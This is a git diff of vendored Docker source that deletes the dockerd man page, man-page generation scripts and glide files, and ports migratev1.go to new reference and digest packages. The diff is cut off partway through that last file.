-[**--experimental**[=*false*]]
-[**--fixed-cidr**[=*FIXED-CIDR*]]
-[**--fixed-cidr-v6**[=*FIXED-CIDR-V6*]]
-[**-G**|**--group**[=*docker*]]
-[**-g**|**--graph**[=*/var/lib/docker*]]
-[**-H**|**--host**[=*[]*]]
-[**--help**]
-[**--icc**[=*true*]]
-[**--init**[=*false*]]
-[**--init-path**[=*""*]]
-[**--insecure-registry**[=*[]*]]
-[**--ip**[=*0.0.0.0*]]
-[**--ip-forward**[=*true*]]
-[**--ip-masq**[=*true*]]
-[**--iptables**[=*true*]]
-[**--ipv6**]
-[**--isolation**[=*default*]]
-[**-l**|**--log-level**[=*info*]]
-[**--label**[=*[]*]]
-[**--live-restore**[=*false*]]
-[**--log-driver**[=*json-file*]]
-[**--log-opt**[=*map[]*]]
-[**--mtu**[=*0*]]
-[**--max-concurrent-downloads**[=*3*]]
-[**--max-concurrent-uploads**[=*5*]]
-[**-p**|**--pidfile**[=*/var/run/docker.pid*]]
-[**--raw-logs**]
-[**--registry-mirror**[=*[]*]]
-[**-s**|**--storage-driver**[=*STORAGE-DRIVER*]]
-[**--seccomp-profile**[=*SECCOMP-PROFILE-PATH*]]
-[**--selinux-enabled**]
-[**--shutdown-timeout**[=*15*]]
-[**--storage-opt**[=*[]*]]
-[**--swarm-default-advertise-addr**[=*IP|INTERFACE*]]
-[**--tls**]
-[**--tlscacert**[=*~/.docker/ca.pem*]]
-[**--tlscert**[=*~/.docker/cert.pem*]]
-[**--tlskey**[=*~/.docker/key.pem*]]
-[**--tlsverify**]
-[**--userland-proxy**[=*true*]]
-[**--userland-proxy-path**[=*""*]]
-[**--userns-remap**[=*default*]]
-
-# DESCRIPTION
-**dockerd** is used for starting the Docker daemon (i.e., to command the daemon
-to manage images, containers etc).  So **dockerd** is a server, as a daemon.
-
-To run the Docker daemon you can specify **dockerd**.
-You can check the daemon options using **dockerd --help**.
-Daemon options should be specified after the **dockerd** keyword in the
-following format.
-
-**dockerd [OPTIONS]**
-
-# OPTIONS
-
-**--add-runtime**=[]
-  Runtimes can be registered with the daemon either via the
-configuration file or using the `--add-runtime` command line argument.
-
-  The following is an example adding 2 runtimes via the configuration:
-
-```json
-{
-	"default-runtime": "runc",
-	"runtimes": {
-		"runc": {
-			"path": "runc"
-		},
-		"custom": {
-			"path": "/usr/local/bin/my-runc-replacement",
-			"runtimeArgs": [
-				"--debug"
-			]
-		}
-	}
-}
-```
-
-  This is the same example via the command line:
-
-```bash
-$ sudo dockerd --add-runtime runc=runc --add-runtime custom=/usr/local/bin/my-runc-replacement
-```
-
-  **Note**: defining runtime arguments via the command line is not supported.
-
-**--api-cors-header**=""
-  Set CORS headers in the Engine API. Default is cors disabled. Give urls like
-  "http://foo, http://bar, ...". Give "*" to allow all.
-
-**--authorization-plugin**=""
-  Set authorization plugins to load
-
-**-b**, **--bridge**=""
-  Attach containers to a pre\-existing network bridge; use 'none' to disable
-  container networking
-
-**--bip**=""
-  Use the provided CIDR notation address for the dynamically created bridge
-  (docker0); Mutually exclusive of \-b
-
-**--cgroup-parent**=""
-  Set parent cgroup for all containers. Default is "/docker" for fs cgroup
-  driver and "system.slice" for systemd cgroup driver.
-
-**--cluster-store**=""
-  URL of the distributed storage backend
-
-**--cluster-advertise**=""
-  Specifies the 'host:port' or `interface:port` combination that this
-  particular daemon instance should use when advertising itself to the cluster.
-  The daemon is reached through this value.
-
-**--cluster-store-opt**=""
-  Specifies options for the Key/Value store.
-
-**--config-file**="/etc/docker/daemon.json"
-  Specifies the JSON file path to load the configuration from.
-
-**--containerd**=""
-  Path to containerd socket.
-
-**-D**, **--debug**=*true*|*false*
-  Enable debug mode. Default is false.
-
-**--default-gateway**=""
-  IPv4 address of the container default gateway; this address must be part of
-  the bridge subnet (which is defined by \-b or \--bip)
-
-**--default-gateway-v6**=""
-  IPv6 address of the container default gateway
-
-**--default-runtime**="runc"
-  Set default runtime if there're more than one specified by `--add-runtime`.
-
-**--default-ulimit**=[]
-  Default ulimits for containers.
-
-**--disable-legacy-registry**=*true*|*false*
-  Disable contacting legacy registries
-
-**--dns**=""
-  Force Docker to use specific DNS servers
-
-**--dns-opt**=""
-  DNS options to use.
-
-**--dns-search**=[]
-  DNS search domains to use.
-
-**--exec-opt**=[]
-  Set runtime execution options. See RUNTIME EXECUTION OPTIONS.
-
-**--exec-root**=""
-  Path to use as the root of the Docker execution state files. Default is
-  `/var/run/docker`.
-
-**--experimental**=""
-  Enable the daemon experimental features.
-
-**--fixed-cidr**=""
-  IPv4 subnet for fixed IPs (e.g., 10.20.0.0/16); this subnet must be nested in
-  the bridge subnet (which is defined by \-b or \-\-bip).
-
-**--fixed-cidr-v6**=""
-  IPv6 subnet for global IPv6 addresses (e.g., 2a00:1450::/64)
-
-**-G**, **--group**=""
-  Group to assign the unix socket specified by -H when running in daemon mode.
-  use '' (the empty string) to disable setting of a group. Default is `docker`.
-
-**-g**, **--graph**=""
-  Path to use as the root of the Docker runtime. Default is `/var/lib/docker`.
-
-**-H**, **--host**=[*unix:///var/run/docker.sock*]: tcp://[host:port] to bind or
-unix://[/path/to/socket] to use.
-  The socket(s) to bind to in daemon mode specified using one or more
-  tcp://host:port, unix:///path/to/socket, fd://* or fd://socketfd.
-
-**--help**
-  Print usage statement
-
-**--icc**=*true*|*false*
-  Allow unrestricted inter\-container and Docker daemon host communication. If
-  disabled, containers can still be linked together using the **--link** option
-  (see **docker-run(1)**). Default is true.
-
-**--init**
-  Run an init process inside containers for signal forwarding and process
-  reaping.
-
-**--init-path**
-  Path to the docker-init binary.
-
-**--insecure-registry**=[]
-  Enable insecure registry communication, i.e., enable un-encrypted and/or
-  untrusted communication.
-
-  List of insecure registries can contain an element with CIDR notation to
-  specify a whole subnet. Insecure registries accept HTTP and/or accept HTTPS
-  with certificates from unknown CAs.
-
-  Enabling `--insecure-registry` is useful when running a local registry.
-  However, because its use creates security vulnerabilities it should ONLY be
-  enabled for testing purposes.  For increased security, users should add their
-  CA to their system's list of trusted CAs instead of using
-  `--insecure-registry`.
-
-**--ip**=""
-  Default IP address to use when binding container ports. Default is `0.0.0.0`.
-
-**--ip-forward**=*true*|*false*
-  Enables IP forwarding on the Docker host. The default is `true`. This flag
-  interacts with the IP forwarding setting on your host system's kernel. If
-  your system has IP forwarding disabled, this setting enables it. If your
-  system has IP forwarding enabled, setting this flag to `--ip-forward=false`
-  has no effect.
-
-  This setting will also enable IPv6 forwarding if you have both
-  `--ip-forward=true` and `--fixed-cidr-v6` set. Note that this may reject
-  Router Advertisements and interfere with the host's existing IPv6
-  configuration. For more information, please consult the documentation about
-  "Advanced Networking - IPv6".
-
-**--ip-masq**=*true*|*false*
-  Enable IP masquerading for bridge's IP range. Default is true.
-
-**--iptables**=*true*|*false*
-  Enable Docker's addition of iptables rules. Default is true.
-
-**--ipv6**=*true*|*false*
-  Enable IPv6 support. Default is false. Docker will create an IPv6-enabled
-  bridge with address fe80::1 which will allow you to create IPv6-enabled
-  containers. Use together with `--fixed-cidr-v6` to provide globally routable
-  IPv6 addresses. IPv6 forwarding will be enabled if not used with
-  `--ip-forward=false`. This may collide with your host's current IPv6
-  settings. For more information please consult the documentation about
-  "Advanced Networking - IPv6".
-
-**--isolation**="*default*"
-   Isolation specifies the type of isolation technology used by containers.
-   Note that the default on Windows server is `process`, and the default on
-   Windows client is `hyperv`. Linux only supports `default`.
-
-**-l**, **--log-level**="*debug*|*info*|*warn*|*error*|*fatal*"
-  Set the logging level. Default is `info`.
-
-**--label**="[]"
-  Set key=value labels to the daemon (displayed in `docker info`)
-
-**--live-restore**=*false*
-  Enable live restore of running containers when the daemon starts so that they
-  are not restarted. This option is applicable only for docker daemon running
-  on Linux host.
-
-**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*"
-  Default driver for container logs. Default is `json-file`.
-  **Warning**: `docker logs` command works only for `json-file` logging driver.
-
-**--log-opt**=[]
-  Logging driver specific options.
-
-**--mtu**=*0*
-  Set the containers network mtu. Default is `0`.
-
-**--max-concurrent-downloads**=*3*
-  Set the max concurrent downloads for each pull. Default is `3`.
-
-**--max-concurrent-uploads**=*5*
-  Set the max concurrent uploads for each push. Default is `5`.
-
-**-p**, **--pidfile**=""
-  Path to use for daemon PID file. Default is `/var/run/docker.pid`
-
-**--raw-logs**
-  Output daemon logs in full timestamp format without ANSI coloring. If this
-  flag is not set, the daemon outputs condensed, colorized logs if a terminal
-  is detected, or full ("raw") output otherwise.
-
-**--registry-mirror**=*<scheme>://<host>*
-  Prepend a registry mirror to be used for image pulls. May be specified
-  multiple times.
-
-**-s**, **--storage-driver**=""
-  Force the Docker runtime to use a specific storage driver.
-
-**--seccomp-profile**=""
-  Path to seccomp profile.
-
-**--selinux-enabled**=*true*|*false*
-  Enable selinux support. Default is false.
-
-**--shutdown-timeout**=*15*
-  Set the shutdown timeout value in seconds. Default is `15`.
-
-**--storage-opt**=[]
-  Set storage driver options. See STORAGE DRIVER OPTIONS.
-
-**--swarm-default-advertise-addr**=*IP|INTERFACE*
-  Set default address or interface for swarm to advertise as its
-  externally-reachable address to other cluster members. This can be a
-  hostname, an IP address, or an interface such as `eth0`. A port cannot be
-  specified with this option.
-
-**--tls**=*true*|*false*
-  Use TLS; implied by --tlsverify. Default is false.
-
-**--tlscacert**=*~/.docker/ca.pem*
-  Trust certs signed only by this CA.
-
-**--tlscert**=*~/.docker/cert.pem*
-  Path to TLS certificate file.
-
-**--tlskey**=*~/.docker/key.pem*
-  Path to TLS key file.
-
-**--tlsverify**=*true*|*false*
-  Use TLS and verify the remote (daemon: verify client, client: verify daemon).
-  Default is false.
-
-**--userland-proxy**=*true*|*false*
-  Rely on a userland proxy implementation for inter-container and
-  outside-to-container loopback communications. Default is true.
-
-**--userland-proxy-path**=""
-  Path to the userland proxy binary.
-
-**--userns-remap**=*default*|*uid:gid*|*user:group*|*user*|*uid*
-  Enable user namespaces for containers on the daemon. Specifying "default"
-  will cause a new user and group to be created to handle UID and GID range
-  remapping for the user namespace mappings used for contained processes.
-  Specifying a user (or uid) and optionally a group (or gid) will cause the
-  daemon to lookup the user and group's subordinate ID ranges for use as the
-  user namespace mappings for contained processes.
-
-# STORAGE DRIVER OPTIONS
-
-Docker uses storage backends (known as "graphdrivers" in the Docker
-internals) to create writable containers from images.  Many of these
-backends use operating system level technologies and can be
-configured.
-
-Specify options to the storage backend with **--storage-opt** flags. The
-backends that currently take options are *devicemapper*, *zfs* and *btrfs*.
-Options for *devicemapper* are prefixed with *dm*, options for *zfs*
-start with *zfs* and options for *btrfs* start with *btrfs*.
-
-Specifically for devicemapper, the default is a "loopback" model which
-requires no pre-configuration, but is extremely inefficient.  Do not
-use it in production.
-
-To make the best use of Docker with the devicemapper backend, you must
-have a recent version of LVM.  Use `lvm` to create a thin pool; for
-more information see `man lvmthin`.  Then, use `--storage-opt
-dm.thinpooldev` to tell the Docker engine to use that pool for
-allocating images and container snapshots.
-
-## Devicemapper options
-
-#### dm.thinpooldev
-
-Specifies a custom block storage device to use for the thin pool.
-
-If using a block device for device mapper storage, it is best to use `lvm`
-to create and manage the thin-pool volume. This volume is then handed to Docker
-to exclusively create snapshot volumes needed for images and containers.
-
-Managing the thin-pool outside of Engine makes for the most feature-rich
-method of having Docker utilize device mapper thin provisioning as the
-backing storage for Docker containers. The highlights of the lvm-based
-thin-pool management feature include: automatic or interactive thin-pool
-resize support, dynamically changing thin-pool features, automatic thinp
-metadata checking when lvm activates the thin-pool, etc.
-
-As a fallback if no thin pool is provided, loopback files are
-created. Loopback is very slow, but can be used without any
-pre-configuration of storage. It is strongly recommended that you do
-not use loopback in production. Ensure your Engine daemon has a
-`--storage-opt dm.thinpooldev` argument provided.
-
-Example use:
-
-   $ dockerd \
-         --storage-opt dm.thinpooldev=/dev/mapper/thin-pool
-
-#### dm.basesize
-
-Specifies the size to use when creating the base device, which limits
-the size of images and containers. The default value is 10G. Note,
-thin devices are inherently "sparse", so a 10G device which is mostly
-empty doesn't use 10 GB of space on the pool. However, the filesystem
-will use more space for base images the larger the device
-is.
-
-The base device size can be increased at daemon restart which will allow
-all future images and containers (based on those new images) to be of the
-new base device size.
-
-Example use: `dockerd --storage-opt dm.basesize=50G`
-
-This will increase the base device size to 50G. The Docker daemon will throw an
-error if existing base device size is larger than 50G. A user can use
-this option to expand the base device size however shrinking is not permitted.
-
-This value affects the system-wide "base" empty filesystem that may already
-be initialized and inherited by pulled images. Typically, a change to this
-value requires additional steps to take effect:
-
-        $ sudo service docker stop
-        $ sudo rm -rf /var/lib/docker
-        $ sudo service docker start
-
-Example use: `dockerd --storage-opt dm.basesize=20G`
-
-#### dm.fs
-
-Specifies the filesystem type to use for the base device. The
-supported options are `ext4` and `xfs`. The default is `ext4`.
-
-Example use: `dockerd --storage-opt dm.fs=xfs`
-
-#### dm.mkfsarg
-
-Specifies extra mkfs arguments to be used when creating the base device.
-
-Example use: `dockerd --storage-opt "dm.mkfsarg=-O ^has_journal"`
-
-#### dm.mountopt
-
-Specifies extra mount options used when mounting the thin devices.
-
-Example use: `dockerd --storage-opt dm.mountopt=nodiscard`
-
-#### dm.use_deferred_removal
-
-Enables use of deferred device removal if `libdm` and the kernel driver
-support the mechanism.
-
-Deferred device removal means that if device is busy when devices are
-being removed/deactivated, then a deferred removal is scheduled on
-device. And devices automatically go away when last user of the device
-exits.
-
-For example, when a container exits, its associated thin device is removed. If
-that device has leaked into some other mount namespace and can't be removed,
-the container exit still succeeds and this option causes the system to schedule
-the device for deferred removal. It does not wait in a loop trying to remove a
-busy device.
-
-Example use: `dockerd --storage-opt dm.use_deferred_removal=true`
-
-#### dm.use_deferred_deletion
-
-Enables use of deferred device deletion for thin pool devices. By default,
-thin pool device deletion is synchronous. Before a container is deleted, the
-Docker daemon removes any associated devices. If the storage driver can not
-remove a device, the container deletion fails and daemon returns.
-
-`Error deleting container: Error response from daemon: Cannot destroy container`
-
-To avoid this failure, enable both deferred device deletion and deferred
-device removal on the daemon.
-
-`dockerd --storage-opt dm.use_deferred_deletion=true --storage-opt dm.use_deferred_removal=true`
-
-With these two options enabled, if a device is busy when the driver is
-deleting a container, the driver marks the device as deleted. Later, when the
-device isn't in use, the driver deletes it.
-
-In general it should be safe to enable this option by default. It will help
-when unintentional leaking of mount point happens across multiple mount
-namespaces.
-
-#### dm.loopdatasize
-
-**Note**: This option configures devicemapper loopback, which should not be
-used in production.
-
-Specifies the size to use when creating the loopback file for the "data" device
-which is used for the thin pool. The default size is 100G. The file is sparse,
-so it will not initially take up this much space.
-
-Example use: `dockerd --storage-opt dm.loopdatasize=200G`
-
-#### dm.loopmetadatasize
-
-**Note**: This option configures devicemapper loopback, which should not be
-used in production.
-
-Specifies the size to use when creating the loopback file for the "metadata"
-device which is used for the thin pool. The default size is 2G. The file is
-sparse, so it will not initially take up this much space.
-
-Example use: `dockerd --storage-opt dm.loopmetadatasize=4G`
-
-#### dm.datadev
-
-(Deprecated, use `dm.thinpooldev`)
-
-Specifies a custom blockdevice to use for data for a Docker-managed thin pool.
-It is better to use `dm.thinpooldev` - see the documentation for it above for
-discussion of the advantages.
-
-#### dm.metadatadev
-
-(Deprecated, use `dm.thinpooldev`)
-
-Specifies a custom blockdevice to use for metadata for a Docker-managed thin
-pool.  See `dm.datadev` for why this is deprecated.
-
-#### dm.blocksize
-
-Specifies a custom blocksize to use for the thin pool.  The default
-blocksize is 64K.
-
-Example use: `dockerd --storage-opt dm.blocksize=512K`
-
-#### dm.blkdiscard
-
-Enables or disables the use of `blkdiscard` when removing devicemapper devices.
-This is disabled by default due to the additional latency, but as a special
-case with loopback devices it will be enabled, in order to re-sparsify the
-loopback file on image/container removal.
-
-Disabling this on loopback can lead to *much* faster container removal times,
-but it also prevents the space used in `/var/lib/docker` directory from being
-returned to the system for other use when containers are removed.
-
-Example use: `dockerd --storage-opt dm.blkdiscard=false`
-
-#### dm.override_udev_sync_check
-
-By default, the devicemapper backend attempts to synchronize with the `udev`
-device manager for the Linux kernel.  This option allows disabling that
-synchronization, to continue even though the configuration may be buggy.
-
-To view the `udev` sync support of a Docker daemon that is using the
-`devicemapper` driver, run:
-
-        $ docker info
-        [...]
-         Udev Sync Supported: true
-        [...]
-
-When `udev` sync support is `true`, then `devicemapper` and `udev` can
-coordinate the activation and deactivation of devices for containers.
-
-When `udev` sync support is `false`, a race condition occurs between the
-`devicemapper` and `udev` during create and cleanup. The race condition results
-in errors and failures. (For information on these failures, see
-[docker#4036](https://github.com/docker/docker/issues/4036))
-
-To allow the `docker` daemon to start, regardless of whether `udev` sync is
-`false`, set `dm.override_udev_sync_check` to true:
-
-        $ dockerd --storage-opt dm.override_udev_sync_check=true
-
-When this value is `true`, the driver continues and simply warns you the errors
-are happening.
-
-**Note**: The ideal is to pursue a `docker` daemon and environment that does
-support synchronizing with `udev`. For further discussion on this topic, see
-[docker#4036](https://github.com/docker/docker/issues/4036).
-Otherwise, set this flag for migrating existing Docker daemons to a daemon with
-a supported environment.
-
-#### dm.min_free_space
-
-Specifies the min free space percent in a thin pool require for new device
-creation to succeed. This check applies to both free data space as well
-as free metadata space. Valid values are from 0% - 99%. Value 0% disables
-free space checking logic. If user does not specify a value for this option,
-the Engine uses a default value of 10%.
-
-Whenever a new a thin pool device is created (during `docker pull` or during
-container creation), the Engine checks if the minimum free space is available.
-If the space is unavailable, then device creation fails and any relevant
-`docker` operation fails.
-
-To recover from this error, you must create more free space in the thin pool to
-recover from the error. You can create free space by deleting some images and
-containers from tge thin pool. You can also add more storage to the thin pool.
-
-To add more space to an LVM (logical volume management) thin pool, just add
-more storage to the  group container thin pool; this should automatically
-resolve any errors. If your configuration uses loop devices, then stop the
-Engine daemon, grow the size of loop files and restart the daemon to resolve
-the issue.
-
-Example use:: `dockerd --storage-opt dm.min_free_space=10%`
-
-#### dm.xfs_nospace_max_retries
-
-Specifies the maximum number of retries XFS should attempt to complete IO when
-ENOSPC (no space) error is returned by underlying storage device.
-
-By default XFS retries infinitely for IO to finish and this can result in
-unkillable process. To change this behavior one can set xfs_nospace_max_retries
-to say 0 and XFS will not retry IO after getting ENOSPC and will shutdown
-filesystem.
-
-Example use:
-
-    $ sudo dockerd --storage-opt dm.xfs_nospace_max_retries=0
-
-
-## ZFS options
-
-#### zfs.fsname
-
-Set zfs filesystem under which docker will create its own datasets.  By default
-docker will pick up the zfs filesystem where docker graph (`/var/lib/docker`)
-is located.
-
-Example use: `dockerd -s zfs --storage-opt zfs.fsname=zroot/docker`
-
-## Btrfs options
-
-#### btrfs.min_space
-
-Specifies the mininum size to use when creating the subvolume which is used for
-containers. If user uses disk quota for btrfs when creating or running a
-container with **--storage-opt size** option, docker should ensure the **size**
-cannot be smaller than **btrfs.min_space**.
-
-Example use: `docker daemon -s btrfs --storage-opt btrfs.min_space=10G`
-
-# CLUSTER STORE OPTIONS
-
-The daemon uses libkv to advertise the node within the cluster.  Some Key/Value
-backends support mutual TLS, and the client TLS settings used by the daemon can
-be configured using the **--cluster-store-opt** flag, specifying the paths to
-PEM encoded files.
-
-#### kv.cacertfile
-
-Specifies the path to a local file with PEM encoded CA certificates to trust
-
-#### kv.certfile
-
-Specifies the path to a local file with a PEM encoded certificate.  This
-certificate is used as the client cert for communication with the Key/Value
-store.
-
-#### kv.keyfile
-
-Specifies the path to a local file with a PEM encoded private key.  This
-private key is used as the client key for communication with the Key/Value
-store.
-
-# Access authorization
-
-Docker's access authorization can be extended by authorization plugins that
-your organization can purchase or build themselves. You can install one or more
-authorization plugins when you start the Docker `daemon` using the
-`--authorization-plugin=PLUGIN_ID` option.
-
-```bash
-dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,...
-```
-
-The `PLUGIN_ID` value is either the plugin's name or a path to its
-specification file. The plugin's implementation determines whether you can
-specify a name or path. Consult with your Docker administrator to get
-information about the plugins available to you.
-
-Once a plugin is installed, requests made to the `daemon` through the command
-line or Docker's Engine API are allowed or denied by the plugin.  If you have
-multiple plugins installed, at least one must allow the request for it to
-complete.
-
-For information about how to create an authorization plugin, see [authorization
-plugin](https://docs.docker.com/engine/extend/authorization/) section in the
-Docker extend section of this documentation.
-
-
-# HISTORY
-Sept 2015, Originally compiled by Shishir Mahajan <shishir.mahajan@redhat.com>
-based on docker.com source material and internal work.
diff --git a/vendor/github.com/docker/docker/man/generate.go b/vendor/github.com/docker/docker/man/generate.go
deleted file mode 100644
index f21614d94a..0000000000
--- a/vendor/github.com/docker/docker/man/generate.go
+++ /dev/null
@@ -1,43 +0,0 @@
-package main
-
-import (
-	"fmt"
-	"os"
-
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/commands"
-	"github.com/docker/docker/pkg/term"
-	"github.com/spf13/cobra"
-	"github.com/spf13/cobra/doc"
-)
-
-func generateManPages(path string) error {
-	header := &doc.GenManHeader{
-		Title:   "DOCKER",
-		Section: "1",
-		Source:  "Docker Community",
-	}
-
-	stdin, stdout, stderr := term.StdStreams()
-	dockerCli := command.NewDockerCli(stdin, stdout, stderr)
-	cmd := &cobra.Command{Use: "docker"}
-	commands.AddCommands(cmd, dockerCli)
-
-	cmd.DisableAutoGenTag = true
-	return doc.GenManTreeFromOpts(cmd, doc.GenManTreeOptions{
-		Header:           header,
-		Path:             path,
-		CommandSeparator: "-",
-	})
-}
-
-func main() {
-	path := "/tmp"
-	if len(os.Args) > 1 {
-		path = os.Args[1]
-	}
-	fmt.Printf("Generating man pages into %s\n", path)
-	if err := generateManPages(path); err != nil {
-		fmt.Fprintf(os.Stderr, "Failed to generate man pages: %s\n", err.Error())
-	}
-}
diff --git a/vendor/github.com/docker/docker/man/generate.sh b/vendor/github.com/docker/docker/man/generate.sh
deleted file mode 100755
index e4126ba4ac..0000000000
--- a/vendor/github.com/docker/docker/man/generate.sh
+++ /dev/null
@@ -1,15 +0,0 @@
-#!/bin/bash
-#
-# Generate man pages for docker/docker
-#
-
-set -eu
-
-mkdir -p ./man/man1
-
-# Generate man pages from cobra commands
-go build -o /tmp/gen-manpages ./man
-/tmp/gen-manpages ./man/man1
-
-# Generate legacy pages from markdown
-./man/md2man-all.sh -q
diff --git a/vendor/github.com/docker/docker/man/glide.lock b/vendor/github.com/docker/docker/man/glide.lock
deleted file mode 100644
index 5ec765a4c6..0000000000
--- a/vendor/github.com/docker/docker/man/glide.lock
+++ /dev/null
@@ -1,52 +0,0 @@
-hash: ead3ea293a6143fe41069ebec814bf197d8c43a92cc7666b1f7e21a419b46feb
-updated: 2016-06-20T21:53:35.420817456Z
-imports:
-- name: github.com/BurntSushi/toml
-  version: f0aeabca5a127c4078abb8c8d64298b147264b55
-- name: github.com/cpuguy83/go-md2man
-  version: a65d4d2de4d5f7c74868dfa9b202a3c8be315aaa
-  subpackages:
-  - md2man
-- name: github.com/fsnotify/fsnotify
-  version: 30411dbcefb7a1da7e84f75530ad3abe4011b4f8
-- name: github.com/hashicorp/hcl
-  version: da486364306ed66c218be9b7953e19173447c18b
-  subpackages:
-  - hcl/ast
-  - hcl/parser
-  - hcl/token
-  - json/parser
-  - hcl/scanner
-  - hcl/strconv
-  - json/scanner
-  - json/token
-- name: github.com/inconshreveable/mousetrap
-  version: 76626ae9c91c4f2a10f34cad8ce83ea42c93bb75
-- name: github.com/magiconair/properties
-  version: c265cfa48dda6474e208715ca93e987829f572f8
-- name: github.com/mitchellh/mapstructure
-  version: d2dd0262208475919e1a362f675cfc0e7c10e905
-- name: github.com/russross/blackfriday
-  version: 1d6b8e9301e720b08a8938b8c25c018285885438
-- name: github.com/shurcooL/sanitized_anchor_name
-  version: 10ef21a441db47d8b13ebcc5fd2310f636973c77
-- name: github.com/spf13/cast
-  version: 27b586b42e29bec072fe7379259cc719e1289da6
-- name: github.com/spf13/jwalterweatherman
-  version: 33c24e77fb80341fe7130ee7c594256ff08ccc46
-- name: github.com/spf13/pflag
-  version: dabebe21bf790f782ea4c7bbd2efc430de182afd
-- name: github.com/spf13/viper
-  version: c1ccc378a054ea8d4e38d8c67f6938d4760b53dd
-- name: golang.org/x/sys
-  version: 62bee037599929a6e9146f29d10dd5208c43507d
-  subpackages:
-  - unix
-- name: gopkg.in/yaml.v2
-  version: a83829b6f1293c91addabc89d0571c246397bbf4
-- name: github.com/spf13/cobra
-  repo: https://github.com/dnephin/cobra
-  subpackages:
-  - doc
-  version: v1.3
-devImports: []
diff --git a/vendor/github.com/docker/docker/man/glide.yaml b/vendor/github.com/docker/docker/man/glide.yaml
deleted file mode 100644
index e99b2670d8..0000000000
--- a/vendor/github.com/docker/docker/man/glide.yaml
+++ /dev/null
@@ -1,12 +0,0 @@
-package: github.com/docker/docker/man
-import:
-- package: github.com/cpuguy83/go-md2man
-  subpackages:
-  - md2man
-- package: github.com/inconshreveable/mousetrap
-- package: github.com/spf13/pflag
-- package: github.com/spf13/viper
-- package: github.com/spf13/cobra
-  repo: https://github.com/dnephin/cobra
-  subpackages:
-  - doc
diff --git a/vendor/github.com/docker/docker/man/md2man-all.sh b/vendor/github.com/docker/docker/man/md2man-all.sh
deleted file mode 100755
index 97c65c93bc..0000000000
--- a/vendor/github.com/docker/docker/man/md2man-all.sh
+++ /dev/null
@@ -1,22 +0,0 @@
-#!/bin/bash
-set -e
-
-# get into this script's directory
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-
-[ "$1" = '-q' ] || {
-	set -x
-	pwd
-}
-
-for FILE in *.md; do
-	base="$(basename "$FILE")"
-	name="${base%.md}"
-	num="${name##*.}"
-	if [ -z "$num" -o "$name" = "$num" ]; then
-		# skip files that aren't of the format xxxx.N.md (like README.md)
-		continue
-	fi
-	mkdir -p "./man${num}"
-	go-md2man -in "$FILE" -out "./man${num}/${name}"
-done
diff --git a/vendor/github.com/docker/docker/migrate/v1/migratev1.go b/vendor/github.com/docker/docker/migrate/v1/migratev1.go
index bc42dd2ca4..9cd759a3b8 100644
--- a/vendor/github.com/docker/docker/migrate/v1/migratev1.go
+++ b/vendor/github.com/docker/docker/migrate/v1/migratev1.go
@@ -1,6 +1,7 @@
-package v1
+package v1 // import "github.com/docker/docker/migrate/v1"
 
 import (
+	"encoding/json"
 	"errors"
 	"fmt"
 	"io/ioutil"
@@ -11,16 +12,15 @@ import (
 	"sync"
 	"time"
 
-	"encoding/json"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/distribution/metadata"
 	"github.com/docker/docker/image"
 	imagev1 "github.com/docker/docker/image/v1"
 	"github.com/docker/docker/layer"
 	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/docker/reference"
+	refstore "github.com/docker/docker/reference"
+	"github.com/opencontainers/go-digest"
+	"github.com/sirupsen/logrus"
 )
 
 type graphIDRegistrar interface {
@@ -56,7 +56,7 @@ var (
 
 // Migrate takes an old graph directory and transforms the metadata into the
 // new format.
-func Migrate(root, driverName string, ls layer.Store, is image.Store, rs reference.Store, ms metadata.Store) error {
+func Migrate(root, driverName string, ls layer.Store, is image.Store, rs refstore.Store, ms metadata.Store) error {
 	graphDir := filepath.Join(root, graphDirName)
 	if _, err := os.Lstat(graphDir); os.IsNotExist(err) {
 		return nil
@@ -88,11 +88,7 @@ func Migrate(root, driverName string, ls layer.Store, is image.Store, rs referen
 		return err
 	}
 
-	if err := migrateRefs(root, driverName, rs, mappings); err != nil {
-		return err
-	}
-
-	return nil
+	return migrateRefs(root, driverName, rs, mappings)
 }
 
 // CalculateLayerChecksums walks an old graph directory and calculates checksums
@@ -195,10 +191,7 @@ func saveMappings(root string, mappings map[string]image.ID) error {
 		return err
 	}
 	defer f.Close()
-	if err := json.NewEncoder(f).Encode(mappings); err != nil {
-		return err
-	}
-	return nil
+	return json.NewEncoder(f).Encode(mappings)
 }
 
 func migrateImages(root string, ls graphIDRegistrar, is image.Store, ms metadata.Store, mappings map[string]image.ID) error {
@@ -325,19 +318,23 @@ func migrateRefs(root, driverName string, rs refAdder, mappings map[string]image
 	for name, repo := range repos.Repositories {
 		for tag, id := range repo {
 			if strongID, exists := mappings[id]; exists {
-				ref, err := reference.WithName(name)
+				ref, err := reference.ParseNormalizedNamed(name)
 				if err != nil {
 					logrus.Errorf("migrate tags: invalid name %q, %q", name, err)
 					continue
 				}
-				if dgst, err := digest.ParseDigest(tag); err == nil {
+				if !reference.IsNameOnly(ref) {
+					logrus.Errorf("migrate tags: invalid name %q, unexpected tag or digest", name)
+					continue
+				}
+				if dgst, err := digest.Parse(tag); err == nil {
 					canonical, err := reference.WithDigest(reference.TrimNamed(ref), dgst)
 					if err != nil {
 						logrus.Errorf("migrate tags: invalid digest %q, %q", dgst, err)
 						continue
 					}
 					if err := rs.AddDigest(canonical, strongID.Digest(), false); err != nil {
-						logrus.Errorf("can't migrate digest %q for %q, err: %q", ref.String(), strongID, err)
+						logrus.Errorf("can't migrate digest %q for %q, err: %q", reference.FamiliarString(ref), strongID, err)
 					}
 				} else {
 					tagRef, err := reference.WithTag(ref, tag)
@@ -346,7 +343,7 @@ func migrateRefs(root, driverName string, rs refAdder, mappings map[string]image
 						continue
 					}
 					if err := rs.AddTag(tagRef, strongID.Digest(), false); err != nil {
-						logrus.Errorf("can't migrate tag %q for %q, err: %q", ref.String(), strongID, err)
+						logrus.Errorf("can't migrate tag %q for %q, err: %q", reference.FamiliarString(ref), strongID, err)
 					}
 				}
 				logrus.Infof("migrated tag %s:%s to point to %s", name, tag, strongID)
@@ -428,7 +425,7 @@ func migrateImage(id, root string, ls graphIDRegistrar, is image.Store, ms metad
 	if err != nil {
 		return err
 	}
-	diffID, err := digest.ParseDigest(string(diffIDData))
+	diffID, err := digest.Parse(string(diffIDData))
